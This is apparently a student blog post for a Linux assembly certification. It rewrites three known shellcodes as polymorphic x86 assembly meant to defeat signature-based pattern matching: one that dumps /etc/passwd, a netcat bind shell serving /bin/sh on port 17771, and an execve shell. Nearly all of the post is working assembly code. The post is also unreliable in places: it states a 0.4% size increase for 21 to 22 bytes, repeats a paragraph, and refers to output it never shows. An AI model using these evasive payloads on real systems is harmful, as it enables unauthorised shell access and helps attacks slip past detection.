Art of Shellcoding: Polymorphic Shellcodes
Polymorphic shellcodes help defeat pattern matching. A great shellcode will combine not only the polymorphism in the shellcode but will combine a variety of techniques including encoding, encryption, and polymorphism. In this post, we will take up 3 different shellcodes and will convert them into the polymorphic ones. A polymorphic shellcode will not differ in the functionality, but we will use a variety of other instructions. This means that polymorphism is nothing but doing the same thing using a variety of different instructions.
/bin/cat /etc/passwd Shellcode
The first payload we will be using is from http://shell-storm.org/shellcode/files/shellcode-571.php . This shellcode is a simple /bin/cat shellcode and will display the contents of /etc/passwd file. The code is as follows:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; Polymorphic Version of /bin/cat Shellcode from http://shell-storm.org/shellcode/files/shellcode-571.php | |
| ; Author: Nipun Jaswal | |
| global _start | |
| section .text | |
| _start: | |
| ; xor eax,eax | |
| xor ecx,ecx ; Clearing out ECX | |
| ; cdq | |
| mul ecx ; Clearing EAX | |
| ; push edx | |
| push eax | |
| ; mov dword [esp-4], ecx ; Moving ECX to the TOP of the Stack | |
| ; sub esp,4 ; Stack Adjustment | |
| mov esi, 0x523e3f0a ; Actual Value - 22232425 | |
| add esi, 0x22232425 ; Adding the Value | |
| push esi ; Push Operation | |
| ; push dword 0x7461632f | |
| inc esi ; Avoiding Null Byte | |
| sub esi, 0x05f80101 ; Adjusting Second Value | |
| push esi ; Push Operation | |
| ; push dword 0x6e69622f | |
| mov ebx, esp | |
| push ecx | |
| sub esi, 0x09f1eebc ; Re-Using ESI, Beating Pattern Matching | |
| push esi | |
| ; push 0x64777373 | |
| sub esi, 0x03074444 ; Re-Using ESI, Beating Pattern Matching | |
| push esi | |
| ; push 0x61702f2f | |
| add esi, 0x02043601 ; Re-Using ESI, Beating Pattern Matching | |
| dec esi ; Avoiding Null Byte | |
| push esi | |
| ; push 0x6374652f | |
| ; Unchanged Section | |
| mov ecx, esp | |
| mov al, 0xb | |
| push edx | |
| push ecx | |
| push ebx | |
| mov ecx,esp | |
| int 0x80 |
Throughout the shellcode, we made use of ADD, SUB, INC & DEC instructions to completely defeat pattern matching. On compiling and Running the code, we get the following output:
Original Payload Length: 43 Bytes
Polymorphic Version Length: 61 Bytes
Change %age : 41% Increase
Netcat Bind TCP Shellcode
The next shellcode is a netcat bind TCP shellcode which allows you to connect to the port 17771 and presents a system shell. The original Shellcode can be downloaded from http://shell-storm.org/shellcode/files/shellcode-872.php and is 58 bytes in length. Using the similar approach we took for the previous shellcode, let see what a polymorphic version of the shellcode looks like:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; http://shell-storm.org/shellcode/files/shellcode-872.php | |
| ; Author: Nipun Jaswal (SLAE-1080) | |
| global _start | |
| section .text | |
| _start: | |
| ; xor eax, eax | |
| xor edx, edx ; Cleared EDX | |
| mul edx ; Cleared EAX | |
| ; push eax | |
| push edx ; EDX is Also Zero | |
| mov esi, 0x30363636 ; Instead of PUSH moved a Value to ESI | |
| add esi, 0x01010101 ; Addition Operation to Get the Same Value i.e. 0x31373737 | |
| push esi ; Push Op | |
| add esi, 0x21010101 ; Adding Random Value to ESI (Avoiding Null) | |
| sub esi, 0x20c7c20b ; Getting Back the Same Value i.e. 0x3170762d | |
| push esi ; Push Op | |
| ; push 0x31373737 | |
| ; push 0x3170762d | |
| mov esi, esp ; Moving ESP to ESI | |
| ; push eax | |
| push edx ; EDX is also Zero | |
| mov edi, 0x68732f30 ; Incremented Value to EDI | |
| dec edi ; Decrement the Value | |
| push edi ; Push EDI | |
| inc edi ; Incremented Again( Avoiding Null Byte) | |
| add edi, 0x05F632FF ; Same as 0x6e69622f (Adjusting the Value For Next Push) | |
| push edi ; Value Pushed | |
| ; push 0x68732f2f ;-le//bin//sh | |
| ; push 0x6e69622f | |
| push 0x2f656c2d ; -le/ remains unmasked | |
| mov edi, esp | |
| ; push eax | |
| push edx ; EDX is same as EAX | |
| mov edx,0x636e2f2e ; Decremented Value of EDX | |
| inc edx ; Increment EDX | |
| push edx ; Push EDX | |
| ; push 0x636e2f2f ;/bin//nc | |
| dec edx ; Back to the Original Value for Null Free OP | |
| add edx, 0xafb3301 ; Add Value to EDX | |
| push edx | |
| ; push 0x6e69622f | |
| mov ebx, esp | |
| xor edx,edx ; Since we Used EDX above, Zeroing it Out Here | |
| push eax | |
| push esi | |
| push edi | |
| push ebx | |
| mov ecx, esp | |
| ; mov al,11 | |
| mov al,12 ; Incremented | |
| dec eax ; Decrement | |
| int 0x80 |
Original Payload Length: 58 Bytes
Polymorphic Version Length: 86 Bytes
Change %age : 48% Increase
Execve Shellcode
The last shellcode is execve shellcode from http://shell-storm.org/shellcode/files/shellcode-575.php and is 21 bytes in length. The shellcode does nothing much than popping up a shell locally. Let's make a polymorphic version of it as follows:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ;http://shell-storm.org/shellcode/files/shellcode-575.php | |
| ;Author: Nipun Jaswal (SLAE-1080) | |
| global _start | |
| section .text | |
| _start: | |
| xchg esi, eax ; Zero to EAX | |
| mov al, 0xb ; Mov Instead of PUSH | |
| ;push byte +0xb | |
| ;pop eax | |
| ;cdq | |
| push ecx ; ECX is also Zero | |
| ;push edx | |
| ;push dword 0x68732f2f | |
| mov esi, 0x68732f2f ; Value Moved to ESI | |
| push esi ; Pushed onto the Stack | |
| dec esi ; Value Decremented to Avoid NULL | |
| add esi, 0x5F63301 ; Added Value to Match Second Parameter | |
| push esi ; Value Pushed | |
| ;push dword 0x6e69622f | |
| mov ebx, esp ; Paramters to EBX | |
| ;xor ecx, ecx | |
| int 0x80 ; Interrupt |
We used the same concepts like we did for the previous shellcodes.
Original Payload Length: 21 Bytes
Polymorphic Version Length: 22 Bytes
Change %age : 0.4% Increase
On running the shellcode, we get the following output:
Original Payload Length: 21 Bytes
Polymorphic Version Length: 22 Bytes
Change %age : 0.4% Increase
On running the shellcode, we get the following output:
Throughout this post, we saw that how a single operation can be done through a countless number of ways and making use of different instructions. In the next post, we will see how we can make our own crypter.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student-ID: SLAE-1080
Student-ID: SLAE-1080
No comments: